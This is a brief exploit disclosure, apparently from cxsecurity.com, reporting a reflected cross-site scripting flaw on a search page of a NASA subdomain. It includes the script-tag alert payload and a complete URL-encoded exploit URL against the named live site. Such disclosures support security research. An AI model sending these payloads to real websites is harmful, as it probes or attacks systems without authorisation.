NASA Subdomain XSS Vulnerability

Published
Credit
Risk
2015.12.31
4TT4CK3R
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

# Exploit Title : NASA Subdomain XSS Vulnerability
# Exploit Author : 4TT4CK3R
# Date : 2015/12/27
# Tested on : Kali linux , Windows 8.1
# Vendor HomePage : https://ghrc.nsstc.nasa.gov/
# Google Dork : No
# Category : Web Application



~ # : Vulnerable Location :https://ghrc.nsstc.nasa.gov/hydro/search.pl

~ # : Using this script for XSS Vunerability Testing :
<script>alert('4TT4CK3R')</script>

~ # : Our Finally address is
:https://ghrc.nsstc.nasa.gov/hydro/search.pl?hydro&pr=%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3E



# Discovered by : 4TT4CK3R
# Hacker is not who deface a website with GoogleDork Which it shared
with another person :)
# I know nothing, It's too soon to say "I KNOW"
# Cyber Police


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com